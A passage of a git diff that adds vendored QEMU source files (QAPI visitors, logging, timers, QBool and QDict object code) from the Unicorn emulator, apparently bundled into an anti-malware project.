QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "boolean"); + return; + } + + *obj = qbool_get_int(qobject_to_qbool(qobj)); +} + +static void qmp_input_type_str(Visitor *v, char **obj, const char *name, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj || qobject_type(qobj) != QTYPE_QSTRING) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "string"); + return; + } + + *obj = g_strdup(qstring_get_str(qobject_to_qstring(qobj))); +} + +static void qmp_input_type_number(Visitor *v, double *obj, const char *name, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj || (qobject_type(qobj) != QTYPE_QFLOAT && + qobject_type(qobj) != QTYPE_QINT)) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "number"); + return; + } + + if (qobject_type(qobj) == QTYPE_QINT) { + *obj = (double)qint_get_int(qobject_to_qint(qobj)); + } else { + *obj = qfloat_get_double(qobject_to_qfloat(qobj)); + } +} + +static void qmp_input_optional(Visitor *v, bool *present, const char *name, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj) { + *present = false; + return; + } + + *present = true; +} + +Visitor *qmp_input_get_visitor(QmpInputVisitor *v) +{ + return &v->visitor; +} + +void qmp_input_visitor_cleanup(QmpInputVisitor *v) +{ + qobject_decref(v->stack[0].obj); + g_free(v); +} + +QmpInputVisitor *qmp_input_visitor_new(QObject *obj) +{ + QmpInputVisitor *v; + + v = g_malloc0(sizeof(*v)); + + v->visitor.start_struct = qmp_input_start_struct; + v->visitor.end_struct = qmp_input_end_struct; + v->visitor.start_implicit_struct = qmp_input_start_implicit_struct; + v->visitor.end_implicit_struct = qmp_input_end_implicit_struct; + v->visitor.start_list = qmp_input_start_list; + v->visitor.next_list = qmp_input_next_list; + v->visitor.end_list = qmp_input_end_list; + v->visitor.type_enum = input_type_enum; + v->visitor.type_int = qmp_input_type_int; + v->visitor.type_bool = qmp_input_type_bool; + v->visitor.type_str = qmp_input_type_str; + v->visitor.type_number = qmp_input_type_number; + v->visitor.optional = qmp_input_optional; + v->visitor.get_next_type = qmp_input_get_next_type; + + qmp_input_push(v, obj, NULL); + qobject_incref(obj); + + return v; +} + +QmpInputVisitor *qmp_input_visitor_new_strict(QObject *obj) +{ + QmpInputVisitor *v; + + v = qmp_input_visitor_new(obj); + v->strict = true; + + return v; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-output-visitor.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-output-visitor.c new file mode 100644 index 0000000..96b3384 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-output-visitor.c @@ -0,0 +1,241 @@ +/* + * Core Definitions for QAPI/QMP Command Registry + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/qmp-output-visitor.h" +#include "qapi/visitor-impl.h" +#include "qemu/queue.h" +#include "qemu-common.h" +#include "qapi/qmp/types.h" +#include "qapi/qmp/qerror.h" + +typedef struct QStackEntry +{ + QObject *value; + bool is_list_head; + QTAILQ_ENTRY(QStackEntry) node; +} QStackEntry; + +typedef QTAILQ_HEAD(QStack, QStackEntry) QStack; + +struct QmpOutputVisitor +{ + Visitor visitor; + QStack stack; +}; + +#define qmp_output_add(qov, name, value) \ + qmp_output_add_obj(qov, name, QOBJECT(value)) +#define qmp_output_push(qov, value) qmp_output_push_obj(qov, QOBJECT(value)) + +static QmpOutputVisitor *to_qov(Visitor *v) +{ + return container_of(v, QmpOutputVisitor, visitor); +} + +static void qmp_output_push_obj(QmpOutputVisitor *qov, QObject *value) +{ + QStackEntry *e = g_malloc0(sizeof(*e)); + + e->value = value; + if (qobject_type(e->value) == QTYPE_QLIST) { + e->is_list_head = true; + } + QTAILQ_INSERT_HEAD(&qov->stack, e, node); +} + +static QObject *qmp_output_pop(QmpOutputVisitor *qov) +{ + QStackEntry *e = QTAILQ_FIRST(&qov->stack); + QObject *value; + QTAILQ_REMOVE(&qov->stack, e, node); + value = e->value; + g_free(e); + return value; +} + +static QObject *qmp_output_first(QmpOutputVisitor *qov) +{ + QStackEntry *e = QTAILQ_LAST(&qov->stack, QStack); + + /* FIXME - find a better way to deal with NULL values */ + if (!e) { + return NULL; + } + + return e->value; +} + +static QObject *qmp_output_last(QmpOutputVisitor *qov) +{ + QStackEntry *e = QTAILQ_FIRST(&qov->stack); + return e->value; +} + +static void qmp_output_add_obj(QmpOutputVisitor *qov, const char *name, + QObject *value) +{ + QObject *cur; + + if (QTAILQ_EMPTY(&qov->stack)) { + qmp_output_push_obj(qov, value); + return; + } + + cur = qmp_output_last(qov); + + switch (qobject_type(cur)) { + case QTYPE_QDICT: + qdict_put_obj(qobject_to_qdict(cur), name, value); + break; + case QTYPE_QLIST: + qlist_append_obj(qobject_to_qlist(cur), value); + break; + default: + qobject_decref(qmp_output_pop(qov)); + qmp_output_push_obj(qov, value); + break; + } +} + +static void qmp_output_start_struct(Visitor *v, void **obj, const char *kind, + const char *name, size_t unused, + Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + QDict *dict = qdict_new(); + + qmp_output_add(qov, name, dict); + qmp_output_push(qov, dict); +} + +static void qmp_output_end_struct(Visitor *v, Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + qmp_output_pop(qov); +} + +static void qmp_output_start_list(Visitor *v, const char *name, Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + QList *list = qlist_new(); + + qmp_output_add(qov, name, list); + qmp_output_push(qov, list); +} + +static GenericList *qmp_output_next_list(Visitor *v, GenericList **listp, + Error **errp) +{ + GenericList *list = *listp; + QmpOutputVisitor *qov = to_qov(v); + QStackEntry *e = QTAILQ_FIRST(&qov->stack); + + assert(e); + if (e->is_list_head) { + e->is_list_head = false; + return list; + } + + return list ? list->next : NULL; +} + +static void qmp_output_end_list(Visitor *v, Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + qmp_output_pop(qov); +} + +static void qmp_output_type_int(Visitor *v, int64_t *obj, const char *name, + Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + qmp_output_add(qov, name, qint_from_int(*obj)); +} + +static void qmp_output_type_bool(Visitor *v, bool *obj, const char *name, + Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + qmp_output_add(qov, name, qbool_from_int(*obj)); +} + +static void qmp_output_type_str(Visitor *v, char **obj, const char *name, + Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + if (*obj) { + qmp_output_add(qov, name, qstring_from_str(*obj)); + } else { + qmp_output_add(qov, name, qstring_from_str("")); + } +} + +static void qmp_output_type_number(Visitor *v, double *obj, const char *name, + Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + qmp_output_add(qov, name, qfloat_from_double(*obj)); +} + +QObject *qmp_output_get_qobject(QmpOutputVisitor *qov) +{ + QObject *obj = qmp_output_first(qov); + if (obj) { + qobject_incref(obj); + } + return obj; +} + +Visitor *qmp_output_get_visitor(QmpOutputVisitor *v) +{ + return &v->visitor; +} + +void qmp_output_visitor_cleanup(QmpOutputVisitor *v) +{ + QStackEntry *e, *tmp; + + /* The bottom QStackEntry, if any, owns the root QObject. See the + * qmp_output_push_obj() invocations in qmp_output_add_obj(). */ + QObject *root = QTAILQ_EMPTY(&v->stack) ? NULL : qmp_output_first(v); + + QTAILQ_FOREACH_SAFE(e, &v->stack, node, tmp) { + QTAILQ_REMOVE(&v->stack, e, node); + g_free(e); + } + + qobject_decref(root); + g_free(v); +} + +QmpOutputVisitor *qmp_output_visitor_new(void) +{ + QmpOutputVisitor *v; + + v = g_malloc0(sizeof(*v)); + + v->visitor.start_struct = qmp_output_start_struct; + v->visitor.end_struct = qmp_output_end_struct; + v->visitor.start_list = qmp_output_start_list; + v->visitor.next_list = qmp_output_next_list; + v->visitor.end_list = qmp_output_end_list; + v->visitor.type_enum = output_type_enum; + v->visitor.type_int = qmp_output_type_int; + v->visitor.type_bool = qmp_output_type_bool; + v->visitor.type_str = qmp_output_type_str; + v->visitor.type_number = qmp_output_type_number; + + QTAILQ_INIT(&v->stack); + + return v; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/string-input-visitor.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/string-input-visitor.c new file mode 100644 index 0000000..cc5826e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/string-input-visitor.c @@ -0,0 +1,325 @@ +/* + * String parsing visitor + * + * Copyright Red Hat, Inc. 2012 + * + * Author: Paolo Bonzini + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qemu-common.h" +#include "qapi/string-input-visitor.h" +#include "qapi/visitor-impl.h" +#include "qapi/qmp/qerror.h" +#include "qemu/queue.h" +#include "qemu/range.h" +#include // strtoll + + +struct StringInputVisitor +{ + Visitor visitor; + + bool head; + + GList *ranges; + GList *cur_range; + int64_t cur; + + const char *string; +}; + +static void free_range(void *range, void *dummy) +{ + g_free(range); +} + +static void parse_str(StringInputVisitor *siv, Error **errp) +{ + char *str = (char *) siv->string; + long long start, end; + Range *cur; + char *endptr; + + if (siv->ranges) { + return; + } + + do { + errno = 0; + start = strtoll(str, &endptr, 0); + if (errno == 0 && endptr > str) { + if (*endptr == '\0') { + cur = g_malloc0(sizeof(*cur)); + cur->begin = start; + cur->end = start + 1; + siv->ranges = g_list_insert_sorted_merged(siv->ranges, cur, + range_compare); + cur = NULL; + str = NULL; + } else if (*endptr == '-') { + str = endptr + 1; + errno = 0; + end = strtoll(str, &endptr, 0); + if (errno == 0 && endptr > str && start <= end && + (start > INT64_MAX - 65536 || + end < start + 65536)) { + if (*endptr == '\0') { + cur = g_malloc0(sizeof(*cur)); + cur->begin = start; + cur->end = end + 1; + siv->ranges = + g_list_insert_sorted_merged(siv->ranges, + cur, + range_compare); + cur = NULL; + str = NULL; + } else if (*endptr == ',') { + str = endptr + 1; + cur = g_malloc0(sizeof(*cur)); + cur->begin = start; + cur->end = end + 1; + siv->ranges = + g_list_insert_sorted_merged(siv->ranges, + cur, + range_compare); + cur = NULL; + } else { + goto error; + } + } else { + goto error; + } + } else if (*endptr == ',') { + str = endptr + 1; + cur = g_malloc0(sizeof(*cur)); + cur->begin = start; + cur->end = start + 1; + siv->ranges = g_list_insert_sorted_merged(siv->ranges, + cur, + range_compare); + cur = NULL; + } else { + goto error; + } + } else { + goto error; + } + } while (str); + + return; +error: + g_list_foreach(siv->ranges, free_range, NULL); + g_list_free(siv->ranges); + siv->ranges = NULL; +} + +static void +start_list(Visitor *v, const char *name, Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + + parse_str(siv, errp); + + siv->cur_range = g_list_first(siv->ranges); + if (siv->cur_range) { + Range *r = siv->cur_range->data; + if (r) { + siv->cur = r->begin; + } + } +} + +static GenericList * +next_list(Visitor *v, GenericList **list, Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + GenericList **link; + Range *r; + + if (!siv->ranges || !siv->cur_range) { + return NULL; + } + + r = siv->cur_range->data; + if (!r) { + return NULL; + } + + if ((uint64_t)siv->cur < r->begin || (uint64_t)siv->cur >= r->end) { + siv->cur_range = g_list_next(siv->cur_range); + if (!siv->cur_range) { + return NULL; + } + r = siv->cur_range->data; + if (!r) { + return NULL; + } + siv->cur = r->begin; + } + + if (siv->head) { + link = list; + siv->head = false; + } else { + link = &(*list)->next; + } + + *link = g_malloc0(sizeof **link); + return *link; +} + +static void +end_list(Visitor *v, Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + siv->head = true; +} + +static void parse_type_int(Visitor *v, int64_t *obj, const char *name, + Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + + if (!siv->string) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "integer"); + return; + } + + parse_str(siv, errp); + + if (!siv->ranges) { + goto error; + } + + if (!siv->cur_range) { + Range *r; + + siv->cur_range = g_list_first(siv->ranges); + if (!siv->cur_range) { + goto error; + } + + r = siv->cur_range->data; + if (!r) { + goto error; + } + + siv->cur = r->begin; + } + + *obj = siv->cur; + siv->cur++; + return; + +error: + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name, + "an int64 value or range"); +} + +static void parse_type_bool(Visitor *v, bool *obj, const char *name, + Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + + if (siv->string) { + if (!strcasecmp(siv->string, "on") || + !strcasecmp(siv->string, "yes") || + !strcasecmp(siv->string, "true")) { + *obj = true; + return; + } + if (!strcasecmp(siv->string, "off") || + !strcasecmp(siv->string, "no") || + !strcasecmp(siv->string, "false")) { + *obj = false; + return; + } + } + + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "boolean"); +} + +static void parse_type_str(Visitor *v, char **obj, const char *name, + Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + if (siv->string) { + *obj = g_strdup(siv->string); + } else { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "string"); + } +} + +static void parse_type_number(Visitor *v, double *obj, const char *name, + Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + char *endp = (char *) siv->string; + double val; + + errno = 0; + if (siv->string) { + val = strtod(siv->string, &endp); + } + if (!siv->string || errno || endp == siv->string || *endp) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "number"); + return; + } + + *obj = val; +} + +static void parse_optional(Visitor *v, bool *present, const char *name, + Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + + if (!siv->string) { + *present = false; + return; + } + + *present = true; +} + +Visitor *string_input_get_visitor(StringInputVisitor *v) +{ + return &v->visitor; +} + +void string_input_visitor_cleanup(StringInputVisitor *v) +{ + g_list_foreach(v->ranges, free_range, NULL); + g_list_free(v->ranges); + g_free(v); +} + +StringInputVisitor *string_input_visitor_new(const char *str) +{ + StringInputVisitor *v; + + v = g_malloc0(sizeof(*v)); + + v->visitor.type_enum = input_type_enum; + v->visitor.type_int = parse_type_int; + v->visitor.type_size = NULL; + v->visitor.type_bool = parse_type_bool; + v->visitor.type_str = parse_type_str; + v->visitor.type_number = parse_type_number; + v->visitor.start_list = start_list; + v->visitor.next_list = next_list; + v->visitor.end_list = end_list; + v->visitor.optional = parse_optional; + + v->string = str; + v->head = true; + return v; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-log.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-log.c new file mode 100644 index 0000000..6198eb6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-log.c @@ -0,0 +1,47 @@ +/* + * Logging support + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "qemu-common.h" +#include "qemu/log.h" + +FILE *qemu_logfile; +int qemu_loglevel; + +void qemu_log(const char *fmt, ...) +{ + va_list ap; + + va_start(ap, fmt); + if (qemu_logfile) { + vfprintf(qemu_logfile, fmt, ap); + } + va_end(ap); +} + +void qemu_log_mask(int mask, const char *fmt, ...) +{ + va_list ap; + + va_start(ap, fmt); + if ((qemu_loglevel & mask) && qemu_logfile) { + vfprintf(qemu_logfile, fmt, ap); + } + va_end(ap); +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-timer.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-timer.c new file mode 100644 index 0000000..28e5121 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-timer.c @@ -0,0 +1,103 @@ +/* + * QEMU System Emulator + * + * Copyright (c) 2003-2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "sysemu/sysemu.h" + +#include "hw/hw.h" + +#include "qemu/timer.h" + +#ifdef CONFIG_PPOLL +#include +#endif + +#ifdef CONFIG_PRCTL_PR_SET_TIMERSLACK +#include +#endif + +#include "uc_priv.h" + +/***********************************************************/ +/* timers */ + +typedef struct QEMUClock { + /* We rely on BQL to protect the timerlists */ + QLIST_HEAD(, QEMUTimerList) timerlists; + + int64_t last; + + QEMUClockType type; + bool enabled; +} QEMUClock; + +static QEMUClock qemu_clocks[QEMU_CLOCK_MAX]; + +/** + * qemu_clock_ptr: + * @type: type of clock + * + * Translate a clock type into a pointer to QEMUClock object. + * + * Returns: a pointer to the QEMUClock object + */ +static inline QEMUClock *qemu_clock_ptr(QEMUClockType type) +{ + return &qemu_clocks[type]; +} + +/* return the host CPU cycle counter and handle stop/restart */ +int64_t cpu_get_ticks(void) +{ + return cpu_get_real_ticks(); +} + +/* return the host CPU monotonic timer and handle stop/restart */ +int64_t cpu_get_clock(void) +{ + return get_clock(); +} + +int64_t qemu_clock_get_ns(QEMUClockType type) +{ + int64_t now, last; + QEMUClock *clock = qemu_clock_ptr(type); + + switch (type) { + case QEMU_CLOCK_REALTIME: + return get_clock(); + default: + case QEMU_CLOCK_VIRTUAL: + return cpu_get_clock(); + case QEMU_CLOCK_HOST: + now = get_clock_realtime(); + last = clock->last; + clock->last = now; + if (now < last) { + // notifier_list_notify(&clock->reset_notifiers, &now); // FIXME + } + return now; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/Makefile.objs new file mode 100644 index 0000000..8d85254 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/Makefile.objs @@ -0,0 +1,2 @@ +util-obj-y = qint.o qstring.o qdict.o qlist.o qfloat.o qbool.o +util-obj-y += qerror.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qbool.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qbool.c new file mode 100644 index 0000000..df4a23b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qbool.c @@ -0,0 +1,68 @@ +/* + * QBool Module + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/qmp/qbool.h" +#include "qapi/qmp/qobject.h" +#include "qemu-common.h" + +static void qbool_destroy_obj(QObject *obj); + +static const QType qbool_type = { + QTYPE_QBOOL, + qbool_destroy_obj, +}; + +/** + * qbool_from_int(): Create a new QBool from an int + * + * Return strong reference. + */ +QBool *qbool_from_int(int value) +{ + QBool *qb; + + qb = g_malloc(sizeof(*qb)); + qb->value = value; + QOBJECT_INIT(qb, &qbool_type); + + return qb; +} + +/** + * qbool_get_int(): Get the stored int + */ +int qbool_get_int(const QBool *qb) +{ + return qb->value; +} + +/** + * qobject_to_qbool(): Convert a QObject into a QBool + */ +QBool *qobject_to_qbool(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QBOOL) + return NULL; + + return container_of(obj, QBool, base); +} + +/** + * qbool_destroy_obj(): Free all memory allocated by a + * QBool object + */ +static void qbool_destroy_obj(QObject *obj) +{ + assert(obj != NULL); + g_free(qobject_to_qbool(obj)); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qdict.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qdict.c new file mode 100644 index 0000000..e1a96a4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qdict.c @@ -0,0 +1,699 @@ +/* + * QDict Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#include "qapi/qmp/qint.h" +#include "qapi/qmp/qfloat.h" +#include "qapi/qmp/qdict.h" +#include "qapi/qmp/qbool.h" +#include "qapi/qmp/qstring.h" +#include "qapi/qmp/qobject.h" +#include "qemu/queue.h" +#include "qemu-common.h" + +static void qdict_destroy_obj(QObject *obj); + +static const QType qdict_type = { + QTYPE_QDICT, + qdict_destroy_obj, +}; + +/** + * qdict_new(): Create a new QDict + * + * Return strong reference. + */ +QDict *qdict_new(void) +{ + QDict *qdict; + + qdict = g_malloc0(sizeof(*qdict)); + QOBJECT_INIT(qdict, &qdict_type); + + return qdict; +} + +/** + * qobject_to_qdict(): Convert a QObject into a QDict + */ +QDict *qobject_to_qdict(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QDICT) + return NULL; + + return container_of(obj, QDict, base); +} + +/** + * tdb_hash(): based on the hash agorithm from gdbm, via tdb + * (from module-init-tools) + */ +static unsigned int tdb_hash(const char *name) +{ + unsigned value; /* Used to compute the hash value. */ + unsigned i; /* Used to cycle through random values. */ + + /* Set the initial value from the key size. */ + for (value = 0x238F13AF * strlen(name), i=0; name[i]; i++) + value = (value + (((const unsigned char *)name)[i] << (i*5 % 24))); + + return (1103515243 * value + 12345); +} + +/** + * alloc_entry(): allocate a new QDictEntry + */ +static QDictEntry *alloc_entry(const char *key, QObject *value) +{ + QDictEntry *entry; + + entry = g_malloc0(sizeof(*entry)); + entry->key = g_strdup(key); + entry->value = value; + + return entry; +} + +/** + * qdict_entry_value(): Return qdict entry value + * + * Return weak reference. + */ +QObject *qdict_entry_value(const QDictEntry *entry) +{ + return entry->value; +} + +/** + * qdict_entry_key(): Return qdict entry key + * + * Return a *pointer* to the string, it has to be duplicated before being + * stored. + */ +const char *qdict_entry_key(const QDictEntry *entry) +{ + return entry->key; +} + +/** + * qdict_find(): List lookup function + */ +static QDictEntry *qdict_find(const QDict *qdict, + const char *key, unsigned int bucket) +{ + QDictEntry *entry; + + QLIST_FOREACH(entry, &qdict->table[bucket], next) + if (!strcmp(entry->key, key)) + return entry; + + return NULL; +} + +/** + * qdict_put_obj(): Put a new QObject into the dictionary + * + * Insert the pair 'key:value' into 'qdict', if 'key' already exists + * its 'value' will be replaced. + * + * This is done by freeing the reference to the stored QObject and + * storing the new one in the same entry. + * + * NOTE: ownership of 'value' is transferred to the QDict + */ +void qdict_put_obj(QDict *qdict, const char *key, QObject *value) +{ + unsigned int bucket; + QDictEntry *entry; + + bucket = tdb_hash(key) % QDICT_BUCKET_MAX; + entry = qdict_find(qdict, key, bucket); + if (entry) { + /* replace key's value */ + qobject_decref(entry->value); + entry->value = value; + } else { + /* allocate a new entry */ + entry = alloc_entry(key, value); + QLIST_INSERT_HEAD(&qdict->table[bucket], entry, next); + qdict->size++; + } +} + +/** + * qdict_get(): Lookup for a given 'key' + * + * Return a weak reference to the QObject associated with 'key' if + * 'key' is present in the dictionary, NULL otherwise. + */ +QObject *qdict_get(const QDict *qdict, const char *key) +{ + QDictEntry *entry; + + entry = qdict_find(qdict, key, tdb_hash(key) % QDICT_BUCKET_MAX); + return (entry == NULL ? NULL : entry->value); +} + +/** + * qdict_haskey(): Check if 'key' exists + * + * Return 1 if 'key' exists in the dict, 0 otherwise + */ +int qdict_haskey(const QDict *qdict, const char *key) +{ + unsigned int bucket = tdb_hash(key) % QDICT_BUCKET_MAX; + return (qdict_find(qdict, key, bucket) == NULL ? 0 : 1); +} + +/** + * qdict_size(): Return the size of the dictionary + */ +size_t qdict_size(const QDict *qdict) +{ + return qdict->size; +} + +/** + * qdict_get_obj(): Get a QObject of a specific type + */ +static QObject *qdict_get_obj(const QDict *qdict, const char *key, + qtype_code type) +{ + QObject *obj; + + obj = qdict_get(qdict, key); + assert(obj != NULL); + assert(qobject_type(obj) == type); + + return obj; +} + +/** + * qdict_get_double(): Get an number mapped by 'key' + * + * This function assumes that 'key' exists and it stores a + * QFloat or QInt object. + * + * Return number mapped by 'key'. + */ +double qdict_get_double(const QDict *qdict, const char *key) +{ + QObject *obj = qdict_get(qdict, key); + + assert(obj); + switch (qobject_type(obj)) { + case QTYPE_QFLOAT: + return qfloat_get_double(qobject_to_qfloat(obj)); + case QTYPE_QINT: + return (double)qint_get_int(qobject_to_qint(obj)); + default: + abort(); + } +} + +/** + * qdict_get_int(): Get an integer mapped by 'key' + * + * This function assumes that 'key' exists and it stores a + * QInt object. + * + * Return integer mapped by 'key'. + */ +int64_t qdict_get_int(const QDict *qdict, const char *key) +{ + QObject *obj = qdict_get_obj(qdict, key, QTYPE_QINT); + return qint_get_int(qobject_to_qint(obj)); +} + +/** + * qdict_get_bool(): Get a bool mapped by 'key' + * + * This function assumes that 'key' exists and it stores a + * QBool object. + * + * Return bool mapped by 'key'. + */ +int qdict_get_bool(const QDict *qdict, const char *key) +{ + QObject *obj = qdict_get_obj(qdict, key, QTYPE_QBOOL); + return qbool_get_int(qobject_to_qbool(obj)); +} + +/** + * qdict_get_qlist(): Get the QList mapped by 'key' + * + * This function assumes that 'key' exists and it stores a + * QList object. + * + * Return QList mapped by 'key'. + */ +QList *qdict_get_qlist(const QDict *qdict, const char *key) +{ + return qobject_to_qlist(qdict_get_obj(qdict, key, QTYPE_QLIST)); +} + +/** + * qdict_get_qdict(): Get the QDict mapped by 'key' + * + * This function assumes that 'key' exists and it stores a + * QDict object. + * + * Return QDict mapped by 'key'. + */ +QDict *qdict_get_qdict(const QDict *qdict, const char *key) +{ + return qobject_to_qdict(qdict_get_obj(qdict, key, QTYPE_QDICT)); +} + +/** + * qdict_get_str(): Get a pointer to the stored string mapped + * by 'key' + * + * This function assumes that 'key' exists and it stores a + * QString object. + * + * Return pointer to the string mapped by 'key'. + */ +const char *qdict_get_str(const QDict *qdict, const char *key) +{ + QObject *obj = qdict_get_obj(qdict, key, QTYPE_QSTRING); + return qstring_get_str(qobject_to_qstring(obj)); +} + +/** + * qdict_get_try_int(): Try to get integer mapped by 'key' + * + * Return integer mapped by 'key', if it is not present in + * the dictionary or if the stored object is not of QInt type + * 'def_value' will be returned. + */ +int64_t qdict_get_try_int(const QDict *qdict, const char *key, + int64_t def_value) +{ + QObject *obj; + + obj = qdict_get(qdict, key); + if (!obj || qobject_type(obj) != QTYPE_QINT) + return def_value; + + return qint_get_int(qobject_to_qint(obj)); +} + +/** + * qdict_get_try_bool(): Try to get a bool mapped by 'key' + * + * Return bool mapped by 'key', if it is not present in the + * dictionary or if the stored object is not of QBool type + * 'def_value' will be returned. + */ +int qdict_get_try_bool(const QDict *qdict, const char *key, int def_value) +{ + QObject *obj; + + obj = qdict_get(qdict, key); + if (!obj || qobject_type(obj) != QTYPE_QBOOL) + return def_value; + + return qbool_get_int(qobject_to_qbool(obj)); +} + +/** + * qdict_get_try_str(): Try to get a pointer to the stored string + * mapped by 'key' + * + * Return a pointer to the string mapped by 'key', if it is not present + * in the dictionary or if the stored object is not of QString type + * NULL will be returned. + */ +const char *qdict_get_try_str(const QDict *qdict, const char *key) +{ + QObject *obj; + + obj = qdict_get(qdict, key); + if (!obj || qobject_type(obj) != QTYPE_QSTRING) + return NULL; + + return qstring_get_str(qobject_to_qstring(obj)); +} + +/** + * qdict_iter(): Iterate over all the dictionary's stored values. + * + * This function allows the user to provide an iterator, which will be + * called for each stored value in the dictionary. + */ +void qdict_iter(const QDict *qdict, + void (*iter)(const char *key, QObject *obj, void *opaque), + void *opaque) +{ + int i; + QDictEntry *entry; + + for (i = 0; i < QDICT_BUCKET_MAX; i++) { + QLIST_FOREACH(entry, &qdict->table[i], next) + iter(entry->key, entry->value, opaque); + } +} + +static QDictEntry *qdict_next_entry(const QDict *qdict, int first_bucket) +{ + int i; + + for (i = first_bucket; i < QDICT_BUCKET_MAX; i++) { + if (!QLIST_EMPTY(&qdict->table[i])) { + return QLIST_FIRST(&qdict->table[i]); + } + } + + return NULL; +} + +/** + * qdict_first(): Return first qdict entry for iteration. + */ +const QDictEntry *qdict_first(const QDict *qdict) +{ + return qdict_next_entry(qdict, 0); +} + +/** + * qdict_next(): Return next qdict entry in an iteration. + */ +const QDictEntry 